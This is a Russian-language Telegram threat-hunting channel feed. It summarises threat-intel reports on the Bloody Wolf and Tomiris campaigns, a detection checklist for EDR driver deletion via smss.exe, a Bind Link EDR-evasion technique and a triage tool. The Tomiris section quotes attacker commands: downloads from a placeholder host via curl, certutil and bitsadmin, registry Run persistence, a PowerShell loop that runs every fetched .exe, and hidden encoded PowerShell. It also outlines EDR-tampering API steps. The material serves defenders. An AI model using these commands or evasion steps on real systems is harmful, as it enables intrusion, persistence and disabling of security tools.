🔻 Bloody Wolf: целевая кампания в Центральной Азии
Bloody Wolf - группа, активная с конца 2023 года. В 2025-м она проводит фишинговые атаки на организации Центральной Азии, используя поддельные документы Минюстов и загрузку легитимного NetSupport RAT через JAR-файлы.
Формат атаки
1) Первичный доступ
Цели: организации Кыргызстана, позднее - Узбекистана (ранее BI.ZONE описывала активность в Казахстане и России).
Атака начинается с фишингового письма с вложенным PDF, стилизованным под документ Министерства юстиции.
В PDF содержатся ссылки вида «материалы дела».
Жертве предлагается установить Java с «официального сайта», якобы необходимую для открытия документов.
2) Загрузка JAR-файла
По ссылке в PDF скачивается вредоносный JAR.
В фазе Узбекистана инфраструктура была геоограниченной:
запросы из-за пределов страны - редирект на легитимный
запросы изнутри страны - автоматическая загрузка JAR.
JAR-файлы компактны, собраны под Java 8, не содержат обфускации и включают один класс.
Основные функции JAR-лоадера:
загрузка компонентов NetSupport Manager по HTTP с встроенного URL;
добавление NetSupport в автозапуск;
создание задания в планировщике;
отображение поддельных сообщений об ошибке, связанных с названием JAR;
ведение счётчика запусков (значение по умолчанию - 3), сохранённого в
3) Механизмы закрепления (Persistence)
JAR создаёт три отдельных механизма автозапуска NetSupport:
Папка автозагрузки
BAT-файл в:
Раздел HKCU\Run
Пример команды:
Планировщик задач
Инструменты и инфраструктура
Ранее Bloody Wolf использовала STRRAT, затем перешла на легитимный NetSupport RAT.
В рассматриваемой кампании применяется старая версия NetSupport Manager (2013 года) с лицензиями, найденными в сети.
Group-IB выявила наличие кастомного генератора JAR-файлов: множество вариантов с различными путями установки, ключами реестра, задачами и текстами ошибок.
Конфигурация JAR хранится во внутренних переменных файла.
Артефакты на хосте
Запуск JAR-файлов пользователями.
Наличие файлов:
Появление BAT-файлов в:
Новые задания планировщика с параметрами
Старые бинарные файлы NetSupport (по хэшам в IoC).
Сетевые индикаторы
HTTP-запросы к доменам:
Поведение геофильтрации:
внешние IP → легитимный
локальные IP → загрузка JAR.
🔗 https://www.group-ib.com/ru/blog/bloody-wolf/
🦔 THF
Bloody Wolf - группа, активная с конца 2023 года. В 2025-м она проводит фишинговые атаки на организации Центральной Азии, используя поддельные документы Минюстов и загрузку легитимного NetSupport RAT через JAR-файлы.
Формат атаки
1) Первичный доступ
Цели: организации Кыргызстана, позднее - Узбекистана (ранее BI.ZONE описывала активность в Казахстане и России).
Атака начинается с фишингового письма с вложенным PDF, стилизованным под документ Министерства юстиции.
В PDF содержатся ссылки вида «материалы дела».
Жертве предлагается установить Java с «официального сайта», якобы необходимую для открытия документов.
2) Загрузка JAR-файла
По ссылке в PDF скачивается вредоносный JAR.
В фазе Узбекистана инфраструктура была геоограниченной:
запросы из-за пределов страны - редирект на легитимный
data[.]egov[.]uz;запросы изнутри страны - автоматическая загрузка JAR.
JAR-файлы компактны, собраны под Java 8, не содержат обфускации и включают один класс.
Основные функции JAR-лоадера:
загрузка компонентов NetSupport Manager по HTTP с встроенного URL;
добавление NetSupport в автозапуск;
создание задания в планировщике;
отображение поддельных сообщений об ошибке, связанных с названием JAR;
ведение счётчика запусков (значение по умолчанию - 3), сохранённого в
%USERPROFILE%\Documents\…\*.dat.3) Механизмы закрепления (Persistence)
JAR создаёт три отдельных механизма автозапуска NetSupport:
Папка автозагрузки
BAT-файл в:
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup
запускает основной исполняемый файл.Раздел HKCU\Run
Пример команды:
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run ^
/v [ключ] /t REG_SZ /d "[путь к EXE]"
Планировщик задач
schtasks /TN "[имя]" /TR "[путь к EXE]" /SC ONLOGON /RL LIMITED /F /RU "%USERNAME%"
Инструменты и инфраструктура
Ранее Bloody Wolf использовала STRRAT, затем перешла на легитимный NetSupport RAT.
В рассматриваемой кампании применяется старая версия NetSupport Manager (2013 года) с лицензиями, найденными в сети.
Group-IB выявила наличие кастомного генератора JAR-файлов: множество вариантов с различными путями установки, ключами реестра, задачами и текстами ошибок.
Конфигурация JAR хранится во внутренних переменных файла.
Артефакты на хосте
Запуск JAR-файлов пользователями.
Наличие файлов:
%USERPROFILE%\Documents\…\*.dat
Появление BAT-файлов в:
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup
Новые ключи в:
HKCU\Software\Microsoft\Windows\CurrentVersion\Run
с путями к исполняемым файлам в Documents\….Новые задания планировщика с параметрами
ONLOGON, RL LIMITED.Старые бинарные файлы NetSupport (по хэшам в IoC).
Сетевые индикаторы
HTTP-запросы к доменам:
minjust-kg[.]com,
esf-kg[.]com,
audit-kg[.]com,
ach-uz[.]com,
uzaudit[.]com,
soliq-uz[.]com,
hisobot-uz[.]com,
ttbbaits[.]com,
nac-ac[.]com,
hgame33[.]com,
ravinads[.]com.
Поведение геофильтрации:
внешние IP → легитимный
data[.]egov[.]uz;локальные IP → загрузка JAR.
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
Short-лист для детекта удаления драйвера через smss.exe
1) Изменения ключа ExistingPageFiles (кроме pagefile.sys)
По документации в ExistingPageFiles должен находиться путь только к существующим файлам подкачки. Любое значение, где отсутствует pagefile.sys или указан другой .sys, особенно относящийся к AV/EDR, - повод для охоты. Опасные признаки: путь к .sys в ProgramData, Temp, Public и других нетипичных директориях.
2) NT-путь вида ??\C:\… в ExistingPageFiles
В официальных примерах путь к pagefile задаётся форматом ??\C:\pagefile.sys. Появление ??\C:, указывающего на другой .sys, означает аномалию. Это отклонение от «нормальной» строки, ожидаемой системой.
3) Кто модифицирует ExistingPageFiles
Ключ обычно меняется через интерфейс системных настроек или штатные системные утилиты. Охотиться нужно на изменения от процессов cmd.exe, powershell.exe, reg.exe, а также любых пользовательских или непрофильных сервисов. Если сторонний процесс вносит кастомное значение — это индикатор атаки.
4) Связка: изменение → перезагрузка → действия smss.exe
Документация Windows фиксирует, что smss.exe читает ExistingPageFiles на старте системы. Последовательность, которая является сильным сигналом атаки:
- изменение ключа на путь к чужому .sys;
- быстрый перезапуск хоста;
- исчезновение или попытка удаления указанного файла .sys после загрузки.
Любое участие smss.exe в операциях над .sys, не относящимся к pagefile, — важный индикатор.
5) Аномалии конфигурации pagefile
Корректные значения ExistingPageFiles и PagingFiles строго определены. В официальных гайдах Microsoft указано, что ошибочные значения ведут к проблемам с pagefile и фиксируются в этих ключах. Ищем:
- множество странных строк;
- ссылки на несуществующие файлы;
- любые .sys вне стандартного контекста pagefile;
- остатки предыдущих попыток техники, которые остались в ключе после ребута.
В целом если есть EDR, то до его смерти может быть найдете заветное изменение😃
🔗 https://t.me/byteoflife/177 сам не проверял, но пишут что работает☺️
🦔 THF
1) Изменения ключа ExistingPageFiles (кроме pagefile.sys)
По документации в ExistingPageFiles должен находиться путь только к существующим файлам подкачки. Любое значение, где отсутствует pagefile.sys или указан другой .sys, особенно относящийся к AV/EDR, - повод для охоты. Опасные признаки: путь к .sys в ProgramData, Temp, Public и других нетипичных директориях.
2) NT-путь вида ??\C:\… в ExistingPageFiles
В официальных примерах путь к pagefile задаётся форматом ??\C:\pagefile.sys. Появление ??\C:, указывающего на другой .sys, означает аномалию. Это отклонение от «нормальной» строки, ожидаемой системой.
3) Кто модифицирует ExistingPageFiles
Ключ обычно меняется через интерфейс системных настроек или штатные системные утилиты. Охотиться нужно на изменения от процессов cmd.exe, powershell.exe, reg.exe, а также любых пользовательских или непрофильных сервисов. Если сторонний процесс вносит кастомное значение — это индикатор атаки.
4) Связка: изменение → перезагрузка → действия smss.exe
Документация Windows фиксирует, что smss.exe читает ExistingPageFiles на старте системы. Последовательность, которая является сильным сигналом атаки:
- изменение ключа на путь к чужому .sys;
- быстрый перезапуск хоста;
- исчезновение или попытка удаления указанного файла .sys после загрузки.
Любое участие smss.exe в операциях над .sys, не относящимся к pagefile, — важный индикатор.
5) Аномалии конфигурации pagefile
Корректные значения ExistingPageFiles и PagingFiles строго определены. В официальных гайдах Microsoft указано, что ошибочные значения ведут к проблемам с pagefile и фиксируются в этих ключах. Ищем:
- множество странных строк;
- ссылки на несуществующие файлы;
- любые .sys вне стандартного контекста pagefile;
- остатки предыдущих попыток техники, которые остались в ключе после ребута.
В целом если есть EDR, то до его смерти может быть найдете заветное изменение
🦔 THF
Please open Telegram to view this post
VIEW IN TELEGRAM
Telegram
ByTe [ ]f Digital Life
Удаляем драйвер через smss.exe
Кто-то меня спрашивал как удалить драйвер AV/EDR, потому что службу мы уже смогли и перезаписать и удалить, а с драйвером так сделать было невозможно.
В общем я что то потыкал и удалил драйвер с перезагрузкой хоста.
Открываем:…
Кто-то меня спрашивал как удалить драйвер AV/EDR, потому что службу мы уже смогли и перезаписать и удалить, а с драйвером так сделать было невозможно.
В общем я что то потыкал и удалил драйвер с перезагрузкой хоста.
Открываем:…
🔥7👍1
Tomiris new tools
Tomiris перешли на мульти-язычные импланты и массовый уход в публичные C2 (Telegram/Discord). Первичный доступ - фишинг с длинными русскими именами
Формат атаки
Фишинг-архив → EXE с маскировкой под документ → reverse shell (C/C++/Rust/Go/Python/PowerShell) → загрузка AdaptixC2/Havoc → дальнейшая эксплуатация.
Новые особенности
C2 через публичные сервисы:
Discord webhooks → Rust Downloader, Python Discord ReverseShell
Telegram bot API → Python Telegram RS, C# Telegram RS, PowerShell Telegram Backdoor
Многоязычные импланты:
C/C++ ReverseShell (несколько вариантов)
Rust Downloader + Rust ReverseShell
Python Discord RS + Python FileGrabber + Python Telegram RS
C# Telegram RS
Go ReverseShell и Go ReverseSocks
PowerShell Telegram Backdoor
Новая цепочка Rust Downloader:
сбор системной информации → отправка на Discord;
поиск файлов → отправка только путей;
дроп VBS+PS1 → цикл загрузки 1.zip → распаковка → запуск всех .exe.
Активное использование open-source фреймворков:
AdaptixC2
Havoc
Dystopia-C2 (в Distopia Backdoor)
ReverseSocks5-форки (C++ и Go)
Повторяющиеся паттерны доставки:
длинные русские названия .exe
файлы в архивах с паролем формата
одинаковые имена → разные импланты внутри
🔗 https://securelist.com/tomiris-new-tools/118143/
Псевдонимы: YoroTrooper | SturgeonPhisher | Silent Lynx | COMRADE SAIGA | Tomiris | ShadowSilk
🦔 THF
Tomiris перешли на мульти-язычные импланты и массовый уход в публичные C2 (Telegram/Discord). Первичный доступ - фишинг с длинными русскими именами
.doc<пробелы>.exe. Дальше - ReverseShell → Havoc/AdaptixC2.Формат атаки
Фишинг-архив → EXE с маскировкой под документ → reverse shell (C/C++/Rust/Go/Python/PowerShell) → загрузка AdaptixC2/Havoc → дальнейшая эксплуатация.
Новые особенности
C2 через публичные сервисы:
Discord webhooks → Rust Downloader, Python Discord ReverseShell
Telegram bot API → Python Telegram RS, C# Telegram RS, PowerShell Telegram Backdoor
Многоязычные импланты:
C/C++ ReverseShell (несколько вариантов)
Rust Downloader + Rust ReverseShell
Python Discord RS + Python FileGrabber + Python Telegram RS
C# Telegram RS
Go ReverseShell и Go ReverseSocks
PowerShell Telegram Backdoor
Новая цепочка Rust Downloader:
сбор системной информации → отправка на Discord;
поиск файлов → отправка только путей;
дроп VBS+PS1 → цикл загрузки 1.zip → распаковка → запуск всех .exe.
Активное использование open-source фреймворков:
AdaptixC2
Havoc
Dystopia-C2 (в Distopia Backdoor)
ReverseSocks5-форки (C++ и Go)
Повторяющиеся паттерны доставки:
длинные русские названия .exe
файлы в архивах с паролем формата
xyz@2025одинаковые имена → разные импланты внутри
Разведка и базовые команды
echo 4fUPU7tGOJBlT6D1wZTUk
whoami
ipconfig /all
systeminfo
hostname
net user /dom
dir
dir C:\users\[username]
Загрузка последующих стадий
bitsadmin /transfer www /download http://<HOST>/winupdate.exe $public\libraries\winvt.exe
curl -o $public\libraries\service.exe http://<HOST>/service.exe
certutil -urlcache -f https://<HOST>/AkelPad.rar $public\libraries\AkelPad.rar
powershell.exe -Command powershell -Command "Invoke-WebRequest -Uri 'https://<HOST>/winupdate.exe' -OutFile '$public\pictures\sbschost.exe'"
Проверка успешной загрузки
dir $temp
dir $public\libraries
Persistence через реестр
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v WinUpdate /t REG_SZ /d $public\pictures\winupdate.exe /f
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Win-NetAlone" /t REG_SZ /d "$public\videos\alone.exe"
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Winservice" /t REG_SZ /d "$public\Pictures\dwm.exe"
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v CurrentVersion /t REG_SZ /d $public\Pictures\sbschost.exe /f
Проверка persistence
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run
Команды Rust Downloader (запуск через cmd.exe)
cmd /C "ipconfig /all"
cmd /C "echo %username%"
cmd /C hostname
cmd /C ver
cmd /C curl hxxps://ipinfo.io/ip
cmd /C curl hxxps://ipinfo.io/country"
Дроп и выполнение VBS/Powershell скриптов
script.vbs:Часть логики script.ps1 (цикл загрузки ZIP):
Set Shell = CreateObject("WScript.Shell")
Shell.Run "powershell -ep Bypass -w hidden -File %temp%\script.ps1"
Invoke-WebRequest -Uri $Url -UseBasicParsing -ErrorAction Stop
iwr -OutFile $env:Temp\1.zip -Uri $dUrl
tar -xf $env:Temp\1.zip -C $env:Temp\rfolder
Get-ChildItem $env:Temp\rfolder -Filter "*.exe" | ForEach-Object { Start-Process $_.FullName }
Команда загрузки Python FileGrabber
cmd.exe /c "curl -o $public\videos\offel.exe http://<HOST>/offel.exe"
Команды Distopia Backdoor (выполненные оператором)
cmd.exe /c "dir"
cmd.exe /c "dir C:\user\[username]\pictures"
cmd.exe /c "pwd"
cmd.exe /c "curl -O $public\sysmgmt.exe http://<HOST>/private/svchost.exe"
cmd.exe /c "$public\sysmgmt.exe"
PowerShell Telegram Backdoor (вызов дроппера)
powershell -ExecutionPolicy Bypass -WindowStyle Hidden -EncodedCommand <Base64>
Псевдонимы: YoroTrooper | SturgeonPhisher | Silent Lynx | COMRADE SAIGA | Tomiris | ShadowSilk
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
😁3 3👍1🔥1
Triage Collector 🦖
A ready-to-run Velociraptor package that collects the evidence responders need without extra setup.
triage.zip provides an out-of-the-box Velociraptor triage collector for Windows, pre-configured for rapid and effective incident response. The project is intended for responders who need a reliable offline collector without the hassle of building from scratch.
🔗 https://triage.zip/
🦔 THF
A ready-to-run Velociraptor package that collects the evidence responders need without extra setup.
triage.zip provides an out-of-the-box Velociraptor triage collector for Windows, pre-configured for rapid and effective incident response. The project is intended for responders who need a reliable offline collector without the hassle of building from scratch.
🔗 https://triage.zip/
🦔 THF
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥3
Forwarded from Know Your Adversary
Media is too big
VIEW IN TELEGRAM
Одно из моих выступлений на SOC Forum в этом году было посвящено работе над этим блогом. В нем я рассказал о 20 самых запоминающихся техниках, которые я виде в публичных исследованиях киберугроз. Делюсь с вами его записью!
👍8🥱2🔥1 1
Bind Link EDR Evasion: Folder Redirection on Windows 11
Формат атаки
• Windows 11 содержит Bind Link API - механизм прозрачного маппинга виртуального пути к физическому (локальному или сетевому).
• PoC EDR-Redir (TwoSevenOneT) использует драйвер
• В результате создаётся «зеркало» EDR-папки, где можно менять файлы, удалять их, внедрять DLL или подставлять бинарь, который затем выполняется в контексте EDR.
• Bind Link позволяет создать новую «родительскую» директорию для EDR, что визуально маскирует подмену.
• Перенаправление каталогов создаёт копию структуры EDR в backing-папке (например,
• Злоумышленник может загрузить вредоносную DLL, имитирующую легитимный модуль EDR, для persistence / hijacking.
• PoC использует стандартные API:
Вызовы
Посмотрим будет ли использовать такую фичу APT😃
🔗 https://ipurple.team/2025/12/01/bind-link-edr-tampering/
🦔 THF
The Bind Link API enables Administrators to create transparent mappings from a virtual path to a backing path (local or remote). The Bind Link feature was introduced in Windows 11 and according to Microsoft it should be used to improve application compatibility by making files stored in a network share appear as local or in scenarios where an application requires files from a different location to appear in a new location without copying the files. It is possible to abuse the feature of bind links to force the redirection of the folder containing the EDR files to a folder that a threat actor has write access to perform evasion.
Формат атаки
• Windows 11 содержит Bind Link API - механизм прозрачного маппинга виртуального пути к физическому (локальному или сетевому).
• PoC EDR-Redir (TwoSevenOneT) использует драйвер
bindflt.sys, чтобы перенаправить каталог EDR в директорию с правом записи.• В результате создаётся «зеркало» EDR-папки, где можно менять файлы, удалять их, внедрять DLL или подставлять бинарь, который затем выполняется в контексте EDR.
• Bind Link позволяет создать новую «родительскую» директорию для EDR, что визуально маскирует подмену.
• Перенаправление каталогов создаёт копию структуры EDR в backing-папке (например,
C:\temp\ipurple).• Злоумышленник может загрузить вредоносную DLL, имитирующую легитимный модуль EDR, для persistence / hijacking.
• PoC использует стандартные API:
CreateDirectoryW — создание прокси-папок,LoadLibraryW — загрузка bindfltapi.dll,Вызовы
BfSetupFilter / BfRemoveMapping — создание/удаление bind links.Detection
The technique of the folder redirection relies on the Bind Link API. Therefore, it is recommended to investigate if the implementation of the EDR supports monitoring of the
bindflt
driver that is used to perform the directory mapping. Alternatively, organizations should assess whether it is feasible to deploy Sysmon to enhance visibility about image load events. Correlation should be also used to validate if there are valid use cases in their environment that utilise the bindfltapi.dll to reduce the noise.
Посмотрим будет ли использовать такую фичу APT
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥9💊1
Please open Telegram to view this post
VIEW IN TELEGRAM
YouTube
Stay Ahead of Ransomware - Threat Hunting for Ransomware and Cyber Extortion
Are YOU hunting for ransomware actors who may be operating in your environment RIGHT NOW?! If you aren’t taking a proactive approach to hunting for ransomware and cyber extortion operations, you may find yourself in quite the predicament. Many times, organizations…
🔥5😁1
Threat Hunting Father 🦔
Проводите время с пользой, вместо рилсов!😃 https://www.youtube.com/live/ZQAwTrdukI0
Может залетим и будем спамить https://t.me/ThreatHuntingFather ?😃
Please open Telegram to view this post
VIEW IN TELEGRAM
😁2